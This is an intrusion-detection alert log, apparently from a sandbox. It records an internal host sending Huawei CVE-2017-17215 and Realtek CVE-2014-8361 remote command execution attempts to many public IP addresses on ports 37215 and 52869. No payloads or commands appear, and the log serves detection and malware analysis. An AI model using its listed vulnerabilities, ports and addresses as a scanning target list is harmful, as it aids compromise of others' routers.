                                      07/20/24-23:01:14.097795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380237215192.168.2.23190.79.68.182
                                      07/20/24-23:01:41.205247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126852869192.168.2.238.226.239.105
                                      07/20/24-23:01:12.807585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4266252869192.168.2.23181.43.61.4
                                      07/20/24-23:01:45.569319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615133452869192.168.2.2393.25.182.143
                                      07/20/24-23:01:27.664887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4723037215192.168.2.23197.157.81.10
                                      07/20/24-23:01:42.988854TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4089852869192.168.2.2377.119.24.21
                                      07/20/24-23:01:41.349768TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613445652869192.168.2.23165.21.55.96
                                      07/20/24-23:01:43.839288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613987052869192.168.2.23184.170.174.78
                                      07/20/24-23:01:52.819848TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3828852869192.168.2.23154.194.235.253
                                      07/20/24-23:01:24.904906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3546037215192.168.2.23109.94.51.165
                                      07/20/24-23:02:09.106165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24576652869192.168.2.2358.172.86.110
                                      07/20/24-23:01:42.574571TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3666652869192.168.2.2354.250.222.170
                                      07/20/24-23:01:52.877228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3996652869192.168.2.2318.255.33.143
                                      07/20/24-23:00:59.163619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501237215192.168.2.23157.20.27.216
                                      07/20/24-23:01:24.929013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660037215192.168.2.23197.202.30.34
                                      07/20/24-23:01:43.096223TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24899652869192.168.2.2375.199.56.180
                                      07/20/24-23:01:01.422220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4473652869192.168.2.23190.124.94.237
                                      07/20/24-23:01:02.059312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4434237215192.168.2.23197.72.210.161
                                      07/20/24-23:01:52.171350TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614483452869192.168.2.2375.3.82.5
                                      07/20/24-23:02:02.714716TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24362652869192.168.2.2332.132.194.251
                                      07/20/24-23:01:55.125263TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5747052869192.168.2.23119.217.160.56
                                      07/20/24-23:01:44.137774TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613714252869192.168.2.2391.203.103.36
                                      07/20/24-23:01:42.611005TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24248052869192.168.2.2312.129.173.144
                                      07/20/24-23:00:59.191389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4395637215192.168.2.23197.16.71.7
                                      07/20/24-23:01:40.290002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3455637215192.168.2.23197.71.206.186
                                      07/20/24-23:01:47.193367TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3441452869192.168.2.2364.212.158.191
                                      07/20/24-23:01:20.592479TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304252869192.168.2.23118.135.71.210
                                      07/20/24-23:01:10.252357TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614592652869192.168.2.2338.189.198.237
                                      07/20/24-23:01:34.044717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161437215192.168.2.23171.231.69.230
                                      07/20/24-23:01:31.333070TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5610052869192.168.2.23221.42.114.149
                                      07/20/24-23:01:45.108909TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25600852869192.168.2.2363.138.19.167
                                      07/20/24-23:01:20.601040TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3425052869192.168.2.2361.157.174.11
                                      07/20/24-23:01:53.999179TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24309252869192.168.2.23105.232.226.131
                                      07/20/24-23:01:08.594120TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5840252869192.168.2.2344.70.248.184
                                      07/20/24-23:01:25.763318TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614698652869192.168.2.23158.118.231.218
                                      07/20/24-23:01:47.858878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5414252869192.168.2.2334.139.90.241
                                      07/20/24-23:01:53.335084TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615719652869192.168.2.2319.154.207.41
                                      07/20/24-23:01:49.660516TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4831852869192.168.2.23135.160.162.200
                                      07/20/24-23:01:42.650744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25652652869192.168.2.23171.216.201.201
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3960837215192.168.2.23161.37.173.233
                                      07/20/24-23:01:47.297941TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5812052869192.168.2.2341.3.4.242
                                      07/20/24-23:01:41.909668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24242052869192.168.2.23184.207.38.235
                                      07/20/24-23:01:47.906061TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613498652869192.168.2.2363.194.155.21
                                      07/20/24-23:01:41.702437TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3697252869192.168.2.23176.90.235.184
                                      07/20/24-23:01:07.066373TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6005437215192.168.2.23197.193.71.4
                                      07/20/24-23:01:03.165362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030052869192.168.2.2357.92.179.211
                                      07/20/24-23:01:51.172994TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24944452869192.168.2.2319.90.99.238
                                      07/20/24-23:01:44.340422TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615600052869192.168.2.23102.51.73.237
                                      07/20/24-23:00:59.163619TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3894637215192.168.2.2367.15.208.48
                                      07/20/24-23:01:20.591862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5882052869192.168.2.238.133.200.251
                                      07/20/24-23:01:51.107223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3604852869192.168.2.2397.235.141.174
                                      07/20/24-23:01:14.049603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3511637215192.168.2.23107.86.91.27
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834437215192.168.2.2323.196.138.54
                                      07/20/24-23:01:01.489542TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614440852869192.168.2.2382.63.31.170
                                      07/20/24-23:01:45.179680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5391852869192.168.2.23118.151.178.3
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4678037215192.168.2.23197.125.71.143
                                      07/20/24-23:01:27.653586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3914037215192.168.2.23157.119.197.238
                                      07/20/24-23:01:49.207937TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814052869192.168.2.2391.195.20.9
                                      07/20/24-23:02:08.090583TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613361852869192.168.2.2390.243.218.95
                                      07/20/24-23:00:57.221570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4317637215192.168.2.23157.215.252.1
                                      07/20/24-23:01:45.182071TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23541052869192.168.2.2357.119.169.7
                                      07/20/24-23:01:51.919746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615329452869192.168.2.23128.17.186.62
                                      07/20/24-23:02:02.509837TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613843652869192.168.2.23202.29.220.93
                                      07/20/24-23:01:40.296076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5871637215192.168.2.23157.129.21.167
                                      07/20/24-23:01:41.323363TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614901052869192.168.2.23191.235.3.135
                                      07/20/24-23:01:49.525770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3652052869192.168.2.23179.230.186.151
                                      07/20/24-23:01:41.405709TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6072252869192.168.2.23156.69.102.152
                                      07/20/24-23:01:53.963505TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4746852869192.168.2.23161.136.114.82
                                      07/20/24-23:02:01.320867TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613855452869192.168.2.2348.17.76.254
                                      07/20/24-23:01:48.965786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614188852869192.168.2.23176.234.87.122
                                      07/20/24-23:01:58.083668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23942652869192.168.2.23210.6.211.62
                                      07/20/24-23:02:00.396073TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615232252869192.168.2.2349.133.161.207
                                      07/20/24-23:01:44.318262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614753852869192.168.2.2338.183.196.72
                                      07/20/24-23:01:44.825081TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5807652869192.168.2.2394.208.23.95
                                      07/20/24-23:01:43.030153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3580652869192.168.2.23140.59.54.38
                                      07/20/24-23:01:40.321300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555437215192.168.2.23197.224.157.32
                                      07/20/24-23:01:08.693187TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6075052869192.168.2.2370.148.71.209
                                      07/20/24-23:01:47.443306TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5126052869192.168.2.2341.3.232.51
                                      07/20/24-23:01:02.046626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5450437215192.168.2.23197.147.196.56
                                      07/20/24-23:01:43.107634TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4597052869192.168.2.2360.118.116.115
                                      07/20/24-23:01:51.275864TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24209652869192.168.2.23200.222.88.102
                                      07/20/24-23:00:57.221017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5905037215192.168.2.23203.201.15.112
                                      07/20/24-23:01:14.097795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4099237215192.168.2.2341.182.86.76
                                      07/20/24-23:01:42.592141TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5358452869192.168.2.23105.155.204.151
                                      07/20/24-23:01:58.995803TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23479252869192.168.2.2337.223.190.191
                                      07/20/24-23:01:08.691384TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4738052869192.168.2.23130.190.148.15
                                      07/20/24-23:01:45.933453TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23328252869192.168.2.2373.152.115.130
                                      07/20/24-23:01:08.621030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4917452869192.168.2.23113.241.155.67
                                      07/20/24-23:01:00.641803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736837215192.168.2.23197.224.26.246
                                      07/20/24-23:01:23.872117TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4605852869192.168.2.23211.69.194.148
                                      07/20/24-23:01:59.300183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3464052869192.168.2.2366.14.7.167
                                      07/20/24-23:01:06.988055TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3975437215192.168.2.23197.232.66.29
                                      07/20/24-23:01:43.305781TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615000452869192.168.2.23207.164.129.53
                                      07/20/24-23:01:45.599519TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4964452869192.168.2.2376.8.56.105
                                      07/20/24-23:01:46.261793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23926652869192.168.2.23137.133.156.16
                                      07/20/24-23:01:53.258882TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614837852869192.168.2.23118.179.102.207
                                      07/20/24-23:01:59.745622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5512252869192.168.2.23154.17.239.28
                                      07/20/24-23:01:04.631848TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615900652869192.168.2.23147.69.83.159
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410637215192.168.2.23197.114.117.243
                                      07/20/24-23:01:04.165954TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4515652869192.168.2.23120.98.109.98
                                      07/20/24-23:00:59.148144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507637215192.168.2.2341.126.20.80
                                      07/20/24-23:01:49.040108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3523852869192.168.2.2345.208.1.181
                                      07/20/24-23:01:41.534135TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614600852869192.168.2.23141.211.193.35
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5812437215192.168.2.23197.68.112.71
                                      07/20/24-23:01:42.702732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4459252869192.168.2.23128.83.244.58
                                      07/20/24-23:01:31.316196TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23656052869192.168.2.2366.164.253.202
                                      07/20/24-23:00:59.213564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833037215192.168.2.2341.128.110.44
                                      07/20/24-23:01:41.605496TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614408052869192.168.2.2349.37.83.56
                                      07/20/24-23:01:42.297644TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23301252869192.168.2.23104.116.61.223
                                      07/20/24-23:01:46.629075TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613618652869192.168.2.23169.80.181.136
                                      07/20/24-23:01:40.321300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071437215192.168.2.23157.183.64.132
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045237215192.168.2.2325.19.64.41
                                      07/20/24-23:01:50.147840TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5921652869192.168.2.2332.64.201.235
                                      07/20/24-23:01:20.161614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3311237215192.168.2.2313.178.123.242
                                      07/20/24-23:01:42.477986TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614505252869192.168.2.2382.187.47.45
                                      07/20/24-23:01:44.813013TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5566452869192.168.2.2353.132.125.29
                                      07/20/24-23:01:55.863393TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295252869192.168.2.23166.125.46.208
                                      07/20/24-23:01:44.470424TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3852652869192.168.2.2398.171.161.225
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558437215192.168.2.23197.60.240.126
                                      07/20/24-23:01:41.380677TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613814852869192.168.2.23110.76.42.187
                                      07/20/24-23:02:00.868779TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615457452869192.168.2.23139.3.200.28
                                      07/20/24-23:01:20.144672TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4874037215192.168.2.23179.166.208.19
                                      07/20/24-23:01:47.042994TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416052869192.168.2.2367.104.194.85
                                      07/20/24-23:01:25.215598TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4982852869192.168.2.2332.85.156.168
                                      07/20/24-23:01:42.809185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615289252869192.168.2.23101.9.169.24
                                      07/20/24-23:01:21.938818TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923637215192.168.2.2341.239.63.70
                                      07/20/24-23:01:43.300793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24746652869192.168.2.23136.80.115.81
                                      07/20/24-23:01:54.898102TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24940452869192.168.2.23104.83.225.175
                                      07/20/24-23:01:48.288217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4875652869192.168.2.2381.22.157.142
                                      07/20/24-23:01:44.302645TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3690652869192.168.2.23181.21.97.146
                                      07/20/24-23:01:53.746309TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4036652869192.168.2.23105.145.121.113
                                      07/20/24-23:01:13.710739TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614408252869192.168.2.2336.168.150.31
                                      07/20/24-23:01:57.313050TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23914252869192.168.2.2391.195.20.9
                                      07/20/24-23:01:53.971751TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912052869192.168.2.23133.40.152.48
                                      07/20/24-23:01:21.943544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5117637215192.168.2.2341.49.181.54
                                      07/20/24-23:01:41.280928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4390052869192.168.2.23223.203.126.251
                                      07/20/24-23:01:43.810783TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614608052869192.168.2.23180.71.140.26
                                      07/20/24-23:01:44.038410TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24532052869192.168.2.2378.42.251.42
                                      07/20/24-23:01:51.197215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298252869192.168.2.23174.95.107.188
                                      07/20/24-23:01:45.079349TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614840852869192.168.2.23179.206.84.130
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5602237215192.168.2.2341.78.28.79
                                      07/20/24-23:01:45.034156TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3371652869192.168.2.23107.163.195.19
                                      07/20/24-23:01:46.464448TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614413652869192.168.2.2393.44.110.204
                                      07/20/24-23:01:31.977603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552837215192.168.2.23157.50.174.241
                                      07/20/24-23:01:55.944701TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5910252869192.168.2.23191.189.100.30
                                      07/20/24-23:01:54.310738TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614876852869192.168.2.23131.175.141.244
                                      07/20/24-23:01:42.891313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615132052869192.168.2.23163.173.48.45
                                      07/20/24-23:01:42.287237TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4400852869192.168.2.2332.178.44.200
                                      07/20/24-23:01:20.124696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4041637215192.168.2.2341.50.141.98
                                      07/20/24-23:01:41.299284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5781852869192.168.2.23113.55.199.122
                                      07/20/24-23:01:08.611391TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23882652869192.168.2.23161.20.12.87
                                      07/20/24-23:01:48.089365TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5667052869192.168.2.2313.253.184.187
                                      07/20/24-23:01:10.738721TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615051252869192.168.2.2350.114.115.150
                                      07/20/24-23:01:01.387027TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5697452869192.168.2.23153.15.211.214
                                      07/20/24-23:01:48.970191TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614990252869192.168.2.2348.202.169.141
                                      07/20/24-23:01:34.043880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906437215192.168.2.2341.5.220.159
                                      07/20/24-23:01:45.485100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3925852869192.168.2.23203.196.31.139
                                      07/20/24-23:01:41.372363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6018052869192.168.2.23132.173.89.17
                                      07/20/24-23:01:41.372363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3832252869192.168.2.2336.18.145.215
                                      07/20/24-23:01:43.455918TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613693252869192.168.2.2340.122.120.5
                                      07/20/24-23:01:48.701127TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25330852869192.168.2.23170.121.46.240
                                      07/20/24-23:01:02.066908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5171437215192.168.2.23157.243.220.45
                                      07/20/24-23:01:02.479085TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613345052869192.168.2.23104.55.221.40
                                      07/20/24-23:01:03.422401TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615367052869192.168.2.23132.102.141.171
                                      07/20/24-23:01:42.111275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5282652869192.168.2.2394.159.177.21
                                      07/20/24-23:01:42.196522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5325852869192.168.2.23140.117.188.131
                                      07/20/24-23:01:42.924014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4987652869192.168.2.2359.110.210.1
                                      07/20/24-23:01:44.991829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23429852869192.168.2.2367.229.67.72
                                      07/20/24-23:01:45.109699TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614061052869192.168.2.2365.170.62.168
                                      07/20/24-23:01:44.452219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4853652869192.168.2.2336.88.70.103
                                      07/20/24-23:01:42.685722TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23805652869192.168.2.2364.123.182.34
                                      07/20/24-23:01:45.188773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24018052869192.168.2.238.242.14.128
                                      07/20/24-23:01:24.944299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6074237215192.168.2.23197.252.66.96
                                      07/20/24-23:01:13.583885TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615832052869192.168.2.238.133.200.251
                                      07/20/24-23:01:47.902509TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614907852869192.168.2.23162.84.55.247
                                      07/20/24-23:01:50.313415TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3802852869192.168.2.23157.175.172.46
                                      07/20/24-23:01:50.093097TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24055452869192.168.2.2338.110.137.130
